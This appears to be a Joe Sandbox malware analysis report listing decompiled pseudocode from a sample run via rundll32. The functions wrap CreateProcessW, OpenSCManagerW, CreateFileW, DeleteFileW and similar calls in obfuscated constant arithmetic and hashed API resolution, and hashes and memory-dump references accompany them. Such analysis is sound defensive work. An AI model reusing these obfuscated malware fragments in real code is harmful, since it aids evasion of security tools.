                                                                                                        0x0497d08e
                                                                                                        0x0497d095
                                                                                                        0x0497d09c
                                                                                                        0x0497d0a3
                                                                                                        0x0497d0a7
                                                                                                        0x0497d0ae
                                                                                                        0x0497d0b5
                                                                                                        0x0497d0bc
                                                                                                        0x0497d0c0
                                                                                                        0x0497d0c7
                                                                                                        0x0497d0ce
                                                                                                        0x0497d0d5
                                                                                                        0x0497d0dc
                                                                                                        0x0497d0e3
                                                                                                        0x0497d0ef
                                                                                                        0x0497d0f7
                                                                                                        0x0497d0fa
                                                                                                        0x0497d101
                                                                                                        0x0497d108
                                                                                                        0x0497d10f
                                                                                                        0x0497d116
                                                                                                        0x0497d11d
                                                                                                        0x0497d13c
                                                                                                        0x0497d145
                                                                                                        0x0497d14b

                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0497D145
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID: 3l}!$7XJ
                                                                                                        • API String ID: 4033686569-2205417827
                                                                                                        • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                        • Instruction ID: 9887ad2e3c9b8d4a39f7ad974676517641a02c9099b27187cd0c23e4a6d8df79
                                                                                                        • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                        • Instruction Fuzzy Hash: E42145B5D00318AFDF08DFA5C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 459 49945ca-49946bc call 498fe29 call 497eb52 CreateFileW
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E049945CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t51;
                                                                                                        				void* _t60;
                                                                                                        				WCHAR* _t64;
                                                                                                        
                                                                                                        				_push(_a48);
                                                                                                        				_t64 = __ecx;
                                                                                                        				_push(_a44);
                                                                                                        				_push(_a40);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(__ecx);
                                                                                                        				E0498FE29(_t51);
                                                                                                        				_v28 = 0x204d4f;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0xd27984;
                                                                                                        				_v20 = _v20 | 0x43788b11;
                                                                                                        				_v20 = _v20 ^ 0x43f3df42;
                                                                                                        				_v16 = 0xf976f1;
                                                                                                        				_v16 = _v16 + 0xffff3d74;
                                                                                                        				_v16 = _v16 | 0xfc5c4419;
                                                                                                        				_v16 = _v16 ^ 0xfcfdb6fc;
                                                                                                        				_v12 = 0xb7df7c;
                                                                                                        				_v12 = _v12 + 0xffff3658;
                                                                                                        				_v12 = _v12 * 0x13;
                                                                                                        				_v12 = _v12 ^ 0x1f30f970;
                                                                                                        				_v12 = _v12 ^ 0x12ab006a;
                                                                                                        				_v8 = 0x8ba8ca;
                                                                                                        				_v8 = _v8 | 0x62aa166a;
                                                                                                        				_v8 = _v8 + 0xa2f6;
                                                                                                        				_v8 = _v8 * 0x55;
                                                                                                        				_v8 = _v8 ^ 0xc33acf6c;
                                                                                                        				E0497EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
                                                                                                        				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
                                                                                                        				return _t60;
                                                                                                        			}












                                                                                                        0x049945d2
                                                                                                        0x049945d7
                                                                                                        0x049945d9
                                                                                                        0x049945dc
                                                                                                        0x049945df
                                                                                                        0x049945e2
                                                                                                        0x049945e5
                                                                                                        0x049945e8
                                                                                                        0x049945eb
                                                                                                        0x049945ee
                                                                                                        0x049945f1
                                                                                                        0x049945f4
                                                                                                        0x049945f5
                                                                                                        0x049945f7
                                                                                                        0x049945f8
                                                                                                        0x049945fd
                                                                                                        0x04994607
                                                                                                        0x0499460a
                                                                                                        0x04994611
                                                                                                        0x04994618
                                                                                                        0x0499461f
                                                                                                        0x04994626
                                                                                                        0x0499462d
                                                                                                        0x04994634
                                                                                                        0x0499463b
                                                                                                        0x04994642
                                                                                                        0x0499465d
                                                                                                        0x04994660
                                                                                                        0x04994667
                                                                                                        0x0499466e
                                                                                                        0x04994675
                                                                                                        0x0499467c
                                                                                                        0x04994688
                                                                                                        0x0499468b
                                                                                                        0x0499469e
                                                                                                        0x049946b5
                                                                                                        0x049946bc

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 049946B5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: OM
                                                                                                        • API String ID: 823142352-4198367855
                                                                                                        • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                        • Instruction ID: 58404e256383185d480ead7027ef6e7a32f09f2e53c575b344fe46ec5360525d
                                                                                                        • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                        • Instruction Fuzzy Hash: 7521EE72801249BBCF05DFA9CD45CDEBFB5EF88304F508199F914A6220D3768A61AF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E0498648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				unsigned int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t41;
                                                                                                        				void* _t49;
                                                                                                        				long _t52;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_t52 = __ecx;
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E0498FE29(_t41);
                                                                                                        				_v12 = 0x3cd3f;
                                                                                                        				_v12 = _v12 << 3;
                                                                                                        				_v12 = _v12 | 0xc677f757;
                                                                                                        				_v12 = _v12 >> 7;
                                                                                                        				_v12 = _v12 ^ 0x0188bcff;
                                                                                                        				_v20 = 0x40fc9e;
                                                                                                        				_v20 = _v20 << 4;
                                                                                                        				_v20 = _v20 ^ 0x040306b1;
                                                                                                        				_v16 = 0x159e9f;
                                                                                                        				_v16 = _v16 + 0xffffd0d5;
                                                                                                        				_v16 = _v16 * 0x33;
                                                                                                        				_v16 = _v16 ^ 0x04433238;
                                                                                                        				_v8 = 0x8a430d;
                                                                                                        				_v8 = _v8 + 0xffffdfbc;
                                                                                                        				_v8 = _v8 | 0x5356d001;
                                                                                                        				_v8 = _v8 + 0x638e;
                                                                                                        				_v8 = _v8 ^ 0x53d0144a;
                                                                                                        				E0497EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
                                                                                                        				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
                                                                                                        				return _t49;
                                                                                                        			}










                                                                                                        0x04986491
                                                                                                        0x04986494
                                                                                                        0x04986496
                                                                                                        0x04986499
                                                                                                        0x0498649c
                                                                                                        0x049864a0
                                                                                                        0x049864a1
                                                                                                        0x049864a6
                                                                                                        0x049864b0
                                                                                                        0x049864b4
                                                                                                        0x049864bb
                                                                                                        0x049864bf
                                                                                                        0x049864c6
                                                                                                        0x049864cd
                                                                                                        0x049864d1
                                                                                                        0x049864d8
                                                                                                        0x049864df
                                                                                                        0x049864fa
                                                                                                        0x049864fd
                                                                                                        0x04986504
                                                                                                        0x0498650b
                                                                                                        0x04986512
                                                                                                        0x04986519
                                                                                                        0x04986520
                                                                                                        0x04986534
                                                                                                        0x04986543
                                                                                                        0x04986549

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04986543
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                        • Instruction ID: 1c03361a233156e92df31df907df11efa4bf02419dc15395b7d4992f8b9a798d
                                                                                                        • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                        • Instruction Fuzzy Hash: 5F1100B2C0121DFBDF06DFA5D9098CEBFB4FB40314F108598E821A6250E3B59B249F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 70%
                                                                                                        			E0498E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t29;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0);
                                                                                                        				E0498FE29(_t29);
                                                                                                        				_v20 = 0xc8e76b;
                                                                                                        				_v20 = _v20 | 0x270203a1;
                                                                                                        				_v20 = _v20 ^ 0x27c97096;
                                                                                                        				_v16 = 0x55aebc;
                                                                                                        				_v16 = _v16 >> 2;
                                                                                                        				_v16 = _v16 ^ 0x00171a80;
                                                                                                        				_v12 = 0xfad6fe;
                                                                                                        				_v12 = _v12 ^ 0xd14a4d1d;
                                                                                                        				_v12 = _v12 ^ 0xd1b10da7;
                                                                                                        				_v8 = 0x428060;
                                                                                                        				_v8 = _v8 * 0x54;
                                                                                                        				_v8 = _v8 ^ 0x15de1a76;
                                                                                                        				E0497EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
                                                                                                        				_t37 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                        				return _t37;
                                                                                                        			}









                                                                                                        0x0498e8bd
                                                                                                        0x0498e8c2
                                                                                                        0x0498e8c5
                                                                                                        0x0498e8c6
                                                                                                        0x0498e8ca
                                                                                                        0x0498e8cb
                                                                                                        0x0498e8d0
                                                                                                        0x0498e8da
                                                                                                        0x0498e8e1
                                                                                                        0x0498e8e8
                                                                                                        0x0498e8ef
                                                                                                        0x0498e8f3
                                                                                                        0x0498e8fa
                                                                                                        0x0498e901
                                                                                                        0x0498e908
                                                                                                        0x0498e90f
                                                                                                        0x0498e92a
                                                                                                        0x0498e92d
                                                                                                        0x0498e941
                                                                                                        0x0498e94e
                                                                                                        0x0498e954

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0498E94E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ManagerOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889721586-0
                                                                                                        • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                        • Instruction ID: 5ec99e3b5d54fbab0e1b8cca7a939878d2e6ff62d8302f0b59b3401f7f5b6985
                                                                                                        • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                        • Instruction Fuzzy Hash: 7411277190221DFB9B04EFE99D468DFBFB4FF44308F108598E825B2211D3B19B149B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0498D11A() {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t39;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0x78f5c7;
                                                                                                        				_v32 = 0xa12bb9;
                                                                                                        				_v28 = 0x4eca09;
                                                                                                        				_v8 = 0x8b256f;
                                                                                                        				_v8 = _v8 << 0xb;
                                                                                                        				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                        				_v8 = _v8 >> 9;
                                                                                                        				_v8 = _v8 ^ 0x00073d60;
                                                                                                        				_v20 = 0x1e549a;
                                                                                                        				_v20 = _v20 + 0xffffad33;
                                                                                                        				_v20 = _v20 ^ 0x00134b4f;
                                                                                                        				_v16 = 0x8dd9dd;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                        				_v12 = 0x358059;
                                                                                                        				_v12 = _v12 + 0xb97b;
                                                                                                        				_v12 = _v12 ^ 0x003502df;
                                                                                                        				E0497EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                        				ExitProcess(0);
                                                                                                        			}












                                                                                                        0x0498d120
                                                                                                        0x0498d124
                                                                                                        0x0498d12b
                                                                                                        0x0498d132
                                                                                                        0x0498d139
                                                                                                        0x0498d140
                                                                                                        0x0498d144
                                                                                                        0x0498d14b
                                                                                                        0x0498d14f
                                                                                                        0x0498d156
                                                                                                        0x0498d15d
                                                                                                        0x0498d164
                                                                                                        0x0498d16b
                                                                                                        0x0498d172
                                                                                                        0x0498d176
                                                                                                        0x0498d17d
                                                                                                        0x0498d184
                                                                                                        0x0498d18b
                                                                                                        0x0498d1ac
                                                                                                        0x0498d1b6

                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0498D1B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction ID: a44110acf2dfc77a9bea2f02eb70a05eaeaa39eb94c79231162b93418d6f838e
                                                                                                        • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction Fuzzy Hash: D81112B1C4030CEBDB44DFE5D94A6DEFBB0EB00708F108588D521B6240D3B89B489F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E0499061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t44;
                                                                                                        				int _t53;
                                                                                                        				WCHAR* _t56;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t56 = __edx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E0498FE29(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0xcd60b7;
                                                                                                        				_v12 = 0x7257ab;
                                                                                                        				_v12 = _v12 << 0xd;
                                                                                                        				_v12 = _v12 + 0x8f69;
                                                                                                        				_v12 = _v12 * 0x4c;
                                                                                                        				_v12 = _v12 ^ 0x410f7a13;
                                                                                                        				_v8 = 0x7b4696;
                                                                                                        				_v8 = _v8 + 0xffff4950;
                                                                                                        				_v8 = _v8 | 0x2a0f624b;
                                                                                                        				_v8 = _v8 * 0x3a;
                                                                                                        				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                        				_v20 = 0x8a2161;
                                                                                                        				_v20 = _v20 + 0xffff45ea;
                                                                                                        				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                        				_v20 = _v20 ^ 0x1be8dede;
                                                                                                        				_v16 = 0xdcc12a;
                                                                                                        				_v16 = _v16 + 0xb9f4;
                                                                                                        				_v16 = _v16 + 0xffffcfef;
                                                                                                        				_v16 = _v16 ^ 0x00d9de04;
                                                                                                        				E0497EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                        				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                        				return _t53;
                                                                                                        			}












                                                                                                        0x04990624
                                                                                                        0x04990627
                                                                                                        0x04990629
                                                                                                        0x0499062c
                                                                                                        0x0499062f
                                                                                                        0x04990630
                                                                                                        0x04990631
                                                                                                        0x04990636
                                                                                                        0x0499063d
                                                                                                        0x04990644
                                                                                                        0x0499064b
                                                                                                        0x0499064f
                                                                                                        0x04990667
                                                                                                        0x0499066a
                                                                                                        0x04990671
                                                                                                        0x04990678
                                                                                                        0x0499067f
                                                                                                        0x0499068b
                                                                                                        0x0499068e
                                                                                                        0x04990695
                                                                                                        0x0499069c
                                                                                                        0x049906a3
                                                                                                        0x049906aa
                                                                                                        0x049906b1
                                                                                                        0x049906b8
                                                                                                        0x049906bf
                                                                                                        0x049906c6
                                                                                                        0x049906d9
                                                                                                        0x049906e5
                                                                                                        0x049906eb

                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 049906E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, Offset: 04970000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.308551888.0000000004970000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.308572241.0000000004996000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4970000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction ID: be1f8e21f556507b2a9ecc5862e28750b50395218f4b0f36e0523c739eb38d1e
                                                                                                        • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                        • Instruction Fuzzy Hash: 6A2110B1C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A7251D3B49B04CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 63 2e82c24-2e82d09 call 2e7fe29 call 2e6eb52 CreateProcessW
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E02E82C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t49;
                                                                                                        				int _t56;
                                                                                                        				WCHAR* _t60;
                                                                                                        
                                                                                                        				_push(_a56);
                                                                                                        				_t60 = __ecx;
                                                                                                        				_push(_a52);
                                                                                                        				_push(0);
                                                                                                        				_push(_a44);
                                                                                                        				_push(_a40);
                                                                                                        				_push(0);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(0);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(__ecx);
                                                                                                        				E02E7FE29(_t49);
                                                                                                        				_v32 = 0x534833;
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v8 = 0x70adbe;
                                                                                                        				_v8 = _v8 >> 5;
                                                                                                        				_v8 = _v8 << 0xa;
                                                                                                        				_v8 = _v8 | 0x1d11c356;
                                                                                                        				_v8 = _v8 ^ 0x1f145645;
                                                                                                        				_v20 = 0xecea8a;
                                                                                                        				_v20 = _v20 | 0x5baa72b8;
                                                                                                        				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                        				_v16 = 0x76217f;
                                                                                                        				_v16 = _v16 >> 0x10;
                                                                                                        				_v16 = _v16 | 0xe98780dc;
                                                                                                        				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                        				_v12 = 0xeb975;
                                                                                                        				_v12 = _v12 ^ 0xd8138edb;
                                                                                                        				_v12 = _v12 | 0x0b4171d5;
                                                                                                        				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                        				E02E6EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                        				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                        				return _t56;
                                                                                                        			}













                                                                                                        0x02e82c2c
                                                                                                        0x02e82c31
                                                                                                        0x02e82c33
                                                                                                        0x02e82c36
                                                                                                        0x02e82c37
                                                                                                        0x02e82c3a
                                                                                                        0x02e82c3d
                                                                                                        0x02e82c3e
                                                                                                        0x02e82c41
                                                                                                        0x02e82c44
                                                                                                        0x02e82c47
                                                                                                        0x02e82c4a
                                                                                                        0x02e82c4b
                                                                                                        0x02e82c4e
                                                                                                        0x02e82c4f
                                                                                                        0x02e82c51
                                                                                                        0x02e82c52
                                                                                                        0x02e82c57
                                                                                                        0x02e82c61
                                                                                                        0x02e82c64
                                                                                                        0x02e82c67
                                                                                                        0x02e82c6e
                                                                                                        0x02e82c72
                                                                                                        0x02e82c76
                                                                                                        0x02e82c7d
                                                                                                        0x02e82c84
                                                                                                        0x02e82c8b
                                                                                                        0x02e82c92
                                                                                                        0x02e82c99
                                                                                                        0x02e82ca0
                                                                                                        0x02e82ca4
                                                                                                        0x02e82cab
                                                                                                        0x02e82cb2
                                                                                                        0x02e82cb9
                                                                                                        0x02e82cc0
                                                                                                        0x02e82cc7
                                                                                                        0x02e82ce8
                                                                                                        0x02e82d02
                                                                                                        0x02e82d09

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 02E82D02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, Offset: 02E60000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.312626227.0000000002E60000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000009.00000002.312674149.0000000002E86000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_2e60000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID: 3HS
                                                                                                        • API String ID: 963392458-330188696
                                                                                                        • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction ID: 5983ff785b0a203a326d5ba94ea331385cb617e78e1f92f1cc9708b25801a5b0
                                                                                                        • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction Fuzzy Hash: 4A21F372800248BBCF159F96DC0ACDFBFB9EF85740F108188F915A2220C3B58A24DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 2e7d11a-2e7d1bb call 2e6eb52 ExitProcess
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E02E7D11A() {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t39;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0x78f5c7;
                                                                                                        				_v32 = 0xa12bb9;
                                                                                                        				_v28 = 0x4eca09;
                                                                                                        				_v8 = 0x8b256f;
                                                                                                        				_v8 = _v8 << 0xb;
                                                                                                        				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                        				_v8 = _v8 >> 9;
                                                                                                        				_v8 = _v8 ^ 0x00073d60;
                                                                                                        				_v20 = 0x1e549a;
                                                                                                        				_v20 = _v20 + 0xffffad33;
                                                                                                        				_v20 = _v20 ^ 0x00134b4f;
                                                                                                        				_v16 = 0x8dd9dd;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                        				_v12 = 0x358059;
                                                                                                        				_v12 = _v12 + 0xb97b;
                                                                                                        				_v12 = _v12 ^ 0x003502df;
                                                                                                        				E02E6EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                        				ExitProcess(0);
                                                                                                        			}












                                                                                                        0x02e7d120
                                                                                                        0x02e7d124
                                                                                                        0x02e7d12b
                                                                                                        0x02e7d132
                                                                                                        0x02e7d139
                                                                                                        0x02e7d140
                                                                                                        0x02e7d144
                                                                                                        0x02e7d14b
                                                                                                        0x02e7d14f
                                                                                                        0x02e7d156
                                                                                                        0x02e7d15d
                                                                                                        0x02e7d164
                                                                                                        0x02e7d16b
                                                                                                        0x02e7d172
                                                                                                        0x02e7d176
                                                                                                        0x02e7d17d
                                                                                                        0x02e7d184
                                                                                                        0x02e7d18b
                                                                                                        0x02e7d1ac
                                                                                                        0x02e7d1b6

                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 02E7D1B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, Offset: 02E60000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.312626227.0000000002E60000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000009.00000002.312674149.0000000002E86000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_2e60000_rundll32.jbxd
